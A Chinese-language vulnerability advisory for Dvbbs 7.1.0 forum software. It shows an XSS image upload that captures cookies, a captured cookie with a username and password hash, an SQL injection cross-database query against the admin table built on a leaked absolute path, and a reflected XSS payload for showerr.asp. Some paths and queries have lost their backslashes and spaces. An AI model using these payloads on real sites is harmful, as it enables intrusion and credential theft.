漏洞发现：LiNZI[B.C.T]@www.cnbct.org

厂商名字：动网先锋论谈

厂商地址：http://www.dvbbs.net/

漏洞程序：Dvbbs7.1.0

漏洞描述:

Dvbbs7.1.0的Cookie存在泄露站点的绝对路径的漏洞，攻击者可以配合其它技术，实现SQL跨库查询等。

漏洞利用例子:

一、泄露绝对漏洞测试:

对官方的测试站点:bbs.dvbbs.net

上传一张图，代码如下:

GIF89a

<script>alert(document.cookie)</script>

抓包得到cookie如下

Cookie:ASPSESSIONIDSSDSCBQD=NHANOBNCAPCPAMCFMAGDIJCB;dwebdvbbs7%2E1%2E0=UserID=617054&usercookies=1&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=linzibct&password=t8ob621664s5v6HL&userhidden=2&StatUserID=2189992004;Dvbbs=

分析cookie可以得到站点的绝对路径如下:

d:webdvbbs7为论谈的绝对路径

二、攻击延伸:

www.host.com

主程序存在sql注入漏洞，但是找不到表名和字段名。

注入点假设:

www.host.comlinzi.asp?fuck=you

论谈为dvbbs7.1.0，数据库为datadvbbs.asp，做了防下载处理.

利用上面的动网暴路径，抓包得到绝对路径为d:wwwdvbbsdatadvbbs.asp

实现跨库查询如下:

www.host.comlinzi.asp?fuck=youand(selectcount(*)fromdv_adminin"d:wwwdvbbsdatadvbbs.asp")

官方补丁:

尚无

测试方法可以有所改变,只需要用户得到目标网站的COOKIE信息就可以了.不需要是BBS的用户的情况下,请大家使用以下方法:

http://www.target.com/bbs/showerr.asp?BoardID=0&ErrCodes=60,60&action=<script>alert(document.cookie)</script>

因为动网的showerr.asp页面过滤不严导致了跨站的效果产生,虽然无伤大雅!!